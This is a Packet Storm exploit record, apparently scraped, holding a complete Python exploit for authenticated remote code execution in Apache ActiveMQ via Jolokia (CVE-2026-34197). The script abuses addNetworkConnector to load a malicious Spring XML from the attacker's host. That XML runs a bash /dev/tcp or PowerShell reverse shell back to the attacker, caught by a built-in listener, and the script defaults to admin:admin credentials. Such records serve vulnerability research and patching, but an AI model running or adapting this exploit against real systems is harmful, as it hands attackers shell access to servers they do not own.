{“lastseen”:”2026-06-01T18:17:12″,”description”:”This is a proof of concept security research tool that evaluates a potential authenticated remote code execution pathway through the Jolokia management interface exposed by Apache ActiveMQ. The tool authenticates to the broker, discovers configuration…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache ActiveMQ Jolokia Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:222315″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34197″],”sourceData”:”==================================================================================================================================\\n | # Title : Apache ActiveMQ Jolokia Management Interface \u2013 Authenticated Remote Code Execution Assessment Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/jolokia.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : a proof-of-concept security research tool that evaluates a potential authenticated remote code execution (RCE) pathway through the Jolokia management interface exposed by Apache ActiveMQ. \\n The tool authenticates to the broker, discovers configuration details, interacts with JMX operations exposed via Jolokia,\\n and attempts to determine whether management functionality can be abused to trigger execution of externally supplied configurations.\\n \\t\\t\\t\\t \\n [+] POC : python 1.py -t 192.168.1.100 -p 8161 -u admin -P admin –lhost 192.168.1.50 –platform linux\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import time\\n import random\\n import string\\n import argparse\\n import threading\\n from http.server import HTTPServer, BaseHTTPRequestHandler\\n from urllib.parse import urlparse, urljoin\\n import os\\n \\n class ActiveMQExploit:\\n def __init__(self, target_host, target_port=8161, username=’admin’, password=’admin’, \\n target_uri=’\/’, ssl=False, broker_name=None, lhost=None, lport=4444):\\n \\”\\”\\”\\n Initialize the ActiveMQ exploit\\n \\”\\”\\”\\n self.target_host = target_host\\n self.target_port = target_port\\n self.username = username\\n self.password = password\\n self.target_uri = target_uri.rstrip(‘\/’)\\n self.ssl = ssl\\n self.broker_name = broker_name\\n self.lhost = lhost\\n self.lport = lport\\n self.http_server = None\\n self.server_thread = None\\n self.payload_executed = False\\n protocol = ‘https’ if ssl else ‘http’\\n self.base_url = f\\”{protocol}:\/\/{target_host}:{target_port}{self.target_uri}\\”\\n self.session = requests.Session()\\n self.session.auth = (username, password)\\n \\n def random_string(self, length=8):\\n \\”\\”\\”Generate random string\\”\\”\\”\\n return ”.join(random.choices(string.ascii_letters + string.digits, k=length))\\n \\n def detect_broker_name(self):\\n \\”\\”\\”Auto-detect broker name if not provided\\”\\”\\”\\n if self.broker_name:\\n print(f\\”[*] Using provided broker name: {self.broker_name}\\”)\\n return self.broker_name\\n \\n print(\\”[*] Attempting to detect broker name…\\”)\\n jolokia_url = urljoin(self.base_url, ‘\/api\/jolokia\/read\/org.apache.activemq:type=Broker,brokerName=*’)\\n \\n try:\\n response = self.session.get(jolokia_url, timeout=10)\\n \\n if response.status_code == 200:\\n data = response.json()\\n if data.get(‘status’) == 200 and data.get(‘value’):\\n for mbean in data[‘value’].keys():\\n for part in mbean.split(‘,’):\\n if part.startswith(‘brokerName=’):\\n name = part.split(‘=’, 1)[1]\\n print(f\\”[+] Detected broker name: {name}\\”)\\n return name\\n \\n print(f\\”[-] Could not detect broker name, using default ‘localhost’\\”)\\n return ‘localhost’\\n \\n except Exception as e:\\n print(f\\”[-] Error detecting broker name: {e}\\”)\\n return ‘localhost’\\n \\n def remove_network_connector(self, broker_name, connector_name=’NC’):\\n \\”\\”\\”Remove existing network connector (cleanup)\\”\\”\\”\\n print(f\\”[*] Attempting to remove existing connector: {connector_name}\\”)\\n \\n jolokia_url = urljoin(self.base_url, ‘\/api\/jolokia\/’)\\n \\n body = {\\n ‘type’: ‘exec’,\\n ‘mbean’: f\\”org.apache.activemq:type=Broker,brokerName={broker_name}\\”,\\n ‘operation’: ‘removeNetworkConnector(java.lang.String)’,\\n ‘arguments’: [connector_name]\\n }\\n \\n try:\\n response = self.session.post(\\n jolokia_url,\\n json=body,\\n headers={‘Content-Type’: ‘application\/json’},\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n print(f\\”[+] Successfully removed connector ‘{connector_name}’\\”)\\n else:\\n print(f\\”[!] Connector ‘{connector_name}’ not found or already removed\\”)\\n \\n except Exception as e:\\n print(f\\”[!] Error removing connector: {e}\\”)\\n \\n def check_authentication(self):\\n \\”\\”\\”Check if authentication is working\\”\\”\\”\\n print(\\”[*] Checking authentication…\\”)\\n \\n jolokia_url = urljoin(self.base_url, ‘\/api\/jolokia\/’)\\n \\n try:\\n response = self.session.get(jolokia_url, timeout=10)\\n \\n if response.status_code == 200:\\n data = response.json()\\n agent = data.get(‘value’, {}).get(‘agent’, ‘unknown’)\\n print(f\\”[+] Authentication successful! Jolokia agent version: {agent}\\”)\\n return True\\n elif response.status_code == 401:\\n print(f\\”[-] Authentication failed! Invalid credentials: {self.username}:{self.password}\\”)\\n return False\\n elif response.status_code == 403:\\n print(\\”[-] Jolokia access forbidden (403)\\”)\\n return False\\n else:\\n print(f\\”[-] Unexpected HTTP status: {response.status_code}\\”)\\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Connection error: {e}\\”)\\n return False\\n \\n def generate_payload(self, platform):\\n \\”\\”\\”Generate payload based on platform\\”\\”\\”\\n if platform == ‘win’:\\n payload = f\\”powershell -NoP -NonI -W Hidden -Exec Bypass -Command \\\\\\”$client = New-Object System.Net.Sockets.TCPClient(‘{self.lhost}’,{self.lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\\u003e\\u00261 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘\\u003e ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\\\\\\”\\”\\n shell = ‘cmd.exe’\\n flag = ‘\/c’\\n else:\\n payload = f\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{self.lhost}\/{self.lport} 0\\u003e\\u00261\\”\\n shell = ‘\/bin\/sh’\\n flag = ‘-c’\\n \\n return shell, flag, payload\\n \\n def create_malicious_xml(self, platform):\\n \\”\\”\\”Create malicious Spring XML payload\\”\\”\\”\\n bean_id = self.random_string(8)\\n shell, flag, command = self.generate_payload(platform)\\n \\n xml_template = f”’\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003cbeans xmlns=\\”http:\/\/www.springframework.org\/schema\/beans\\”\\n xmlns:xsi=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\”\\n xsi:schemaLocation=\\”http:\/\/www.springframework.org\/schema\/beans\\n http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\\”\\u003e\\n \\u003cbean id=\\”{bean_id}\\” class=\\”java.lang.ProcessBuilder\\” init-method=\\”start\\”\\u003e\\n \\u003cconstructor-arg\\u003e\\n \\u003clist\\u003e\\n \\u003cvalue\\u003e{shell}\\u003c\/value\\u003e\\n \\u003cvalue\\u003e{flag}\\u003c\/value\\u003e\\n \\u003cvalue\\u003e\\u003c![CDATA[{command}]]\\u003e\\u003c\/value\\u003e\\n \\u003c\/list\\u003e\\n \\u003c\/constructor-arg\\u003e\\n \\u003c\/bean\\u003e\\n \\u003c\/beans\\u003e”’\\n \\n return xml_template\\n \\n def exploit(self, platform=’linux’, reverse_port=None):\\n \\”\\”\\”Main exploit function\\”\\”\\”\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”Apache ActiveMQ RCE via Jolokia (CVE-2026-34197)\\”)\\n print(\\”=\\”*60 + \\”\\\\n\\”)\\n if not self.check_authentication():\\n print(\\”[-] Authentication failed. Exiting…\\”)\\n return False\\n broker_name = self.detect_broker_name()\\n self.remove_network_connector(broker_name)\\n if not self.start_http_server(platform):\\n print(\\”[-] Failed to start HTTP server\\”)\\n return False\\n connector_id = self.random_string(8)\\n malicious_uri = f\\”static:(vm:\/\/{self.random_string(8)}?brokerConfig=xbean:http:\/\/{self.lhost}:{self.http_server_port}\/payload.xml)\\”\\n \\n print(f\\”[*] Malicious URI: {malicious_uri}\\”)\\n jolokia_url = urljoin(self.base_url, ‘\/api\/jolokia\/’)\\n \\n exploit_body = {\\n ‘type’: ‘exec’,\\n ‘mbean’: f\\”org.apache.activemq:type=Broker,brokerName={broker_name}\\”,\\n ‘operation’: ‘addNetworkConnector(java.lang.String)’,\\n ‘arguments’: [malicious_uri]\\n }\\n \\n print(f\\”[*] Sending exploit request to {self.target_host}:{self.target_port}\\”)\\n \\n try:\\n response = self.session.post(\\n jolokia_url,\\n json=exploit_body,\\n headers={‘Content-Type’: ‘application\/json’},\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n data = response.json()\\n if data.get(‘status’) == 200:\\n print(\\”[+] Exploit accepted by Jolokia!\\”)\\n else:\\n print(f\\”[!] Jolokia returned status {data.get(‘status’)}: {data.get(‘error’, ‘Unknown error’)}\\”)\\n elif response.status_code == 401:\\n print(\\”[-] Authentication failed during exploit\\”)\\n return False\\n else:\\n print(f\\”[*] Unexpected response: {response.status_code} (continuing anyway)\\”)\\n \\n except requests.exceptions.Timeout:\\n print(\\”[*] Request timed out – This is expected if the payload executed successfully\\”)\\n except Exception as e:\\n print(f\\”[!] Error sending exploit: {e}\\”)\\n \\n print(\\”\\\\n[*] Waiting for payload execution…\\”)\\n print(f\\”[*] Make sure to listen on port {self.lport if reverse_port else self.http_server_port}\\”)\\n print(\\”[*] Check your netcat listener for the reverse shell\\”)\\n while not self.payload_executed:\\n time.sleep(1)\\n \\n return True\\n \\n class ExploitHTTPHandler(BaseHTTPRequestHandler):\\n \\”\\”\\”Custom HTTP handler to serve malicious XML\\”\\”\\”\\n \\n parent = None\\n \\n def log_message(self, format, *args):\\n pass\\n \\n def do_GET(self):\\n if self.path == ‘\/payload.xml’:\\n self.send_response(200)\\n self.send_header(‘Content-Type’, ‘application\/xml’)\\n self.send_header(‘Connection’, ‘close’)\\n self.end_headers()\\n self.wfile.write(self.server.xml_content.encode(‘utf-8’))\\n print(\\”[+] Serving malicious Spring XML to target!\\”)\\n if self.server.parent:\\n self.server.parent.payload_executed = True\\n else:\\n self.send_response(404)\\n self.end_headers()\\n \\n def do_POST(self):\\n self.do_GET()\\n \\n def start_http_server(self, platform):\\n \\”\\”\\”Start HTTP server to host malicious XML\\”\\”\\”\\n try:\\n self.http_server_port = 8080 \\n self.xml_content = self.create_malicious_xml(platform)\\n self.server = HTTPServer((‘0.0.0.0’, self.http_server_port), self.ExploitHTTPHandler)\\n self.server.xml_content = self.xml_content\\n self.server.parent = self\\n self.server_thread = threading.Thread(target=self.server.serve_forever)\\n self.server_thread.daemon = True\\n self.server_thread.start()\\n \\n print(f\\”[+] HTTP server started on port {self.http_server_port}\\”)\\n print(f\\”[+] Hosting malicious XML at: http:\/\/{self.lhost}:{self.http_server_port}\/payload.xml\\”)\\n return True\\n \\n except Exception as e:\\n print(f\\”[-] Failed to start HTTP server: {e}\\”)\\n return False\\n \\n def stop_http_server(self):\\n \\”\\”\\”Stop the HTTP server\\”\\”\\”\\n if hasattr(self, ‘server’):\\n print(\\”[*] Stopping HTTP server…\\”)\\n self.server.shutdown()\\n self.server.server_close()\\n self.server_thread.join()\\n \\n class NetcatListener:\\n \\”\\”\\”Simple netcat listener for reverse shells\\”\\”\\”\\n @staticmethod\\n def start_listener(port):\\n import socket\\n import threading\\n \\n def handle_client(client_socket, address):\\n print(f\\”[+] Connection from {address}\\”)\\n while True:\\n try:\\n data = client_socket.recv(1024)\\n if not data:\\n break\\n print(data.decode(‘utf-8′, errors=’ignore’), end=”)\\n cmd = input()\\n client_socket.send((cmd + ‘\\\\n’).encode())\\n except:\\n break\\n client_socket.close()\\n \\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n server.bind((‘0.0.0.0′, port))\\n server.listen(5)\\n print(f\\”[*] Listening for reverse shell on port {port}…\\”)\\n \\n while True:\\n client, addr = server.accept()\\n thread = threading.Thread(target=handle_client, args=(client, addr))\\n thread.start()\\n \\n def main():\\n parser = argparse.ArgumentParser(description=’Apache ActiveMQ RCE Exploit (CVE-2026-34197)’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target host (IP or domain)’)\\n parser.add_argument(‘-p’, ‘–port’, type=int, default=8161, help=’Target port (default: 8161)’)\\n parser.add_argument(‘-u’, ‘–username’, default=’admin’, help=’Jolokia username (default: admin)’)\\n parser.add_argument(‘-P’, ‘–password’, default=’admin’, help=’Jolokia password (default: admin)’)\\n parser.add_argument(‘–ssl’, action=’store_true’, help=’Use HTTPS’)\\n parser.add_argument(‘–broker-name’, help=’Broker name (auto-detected if not provided)’)\\n parser.add_argument(‘–platform’, choices=[‘linux’, ‘win’], default=’linux’, help=’Target platform (default: linux)’)\\n parser.add_argument(‘–lhost’, required=True, help=’Local host for reverse shell and HTTP server’)\\n parser.add_argument(‘–lport’, type=int, default=4444, help=’Local port for reverse shell (default: 4444)’)\\n parser.add_argument(‘–http-port’, type=int, default=8080, help=’HTTP server port (default: 8080)’)\\n \\n args = parser.parse_args()\\n \\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Apache ActiveMQ RCE Exploit (CVE-2026-34197) \u2551\\n \u2551 Python Port – by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n exploit = ActiveMQExploit(\\n target_host=args.target,\\n target_port=args.port,\\n username=args.username,\\n password=args.password,\\n ssl=args.ssl,\\n broker_name=args.broker_name,\\n lhost=args.lhost,\\n lport=args.lport\\n )\\n exploit.http_server_port = args.http_port\\n listener_thread = threading.Thread(target=NetcatListener.start_listener, args=(args.lport,))\\n listener_thread.daemon = True\\n listener_thread.start()\\n try:\\n exploit.exploit(platform=args.platform)\\n while True:\\n time.sleep(1)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n[!] Interrupted by user\\”)\\n exploit.stop_http_server()\\n sys.exit(0)\\n \\n if __name__ == ‘__main__’:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222315″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222315\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-01T18:17:12″,”description”:”This is a proof of concept security research tool that evaluates a potential authenticated remote code execution pathway through the Jolokia management interface exposed by…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-58923","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n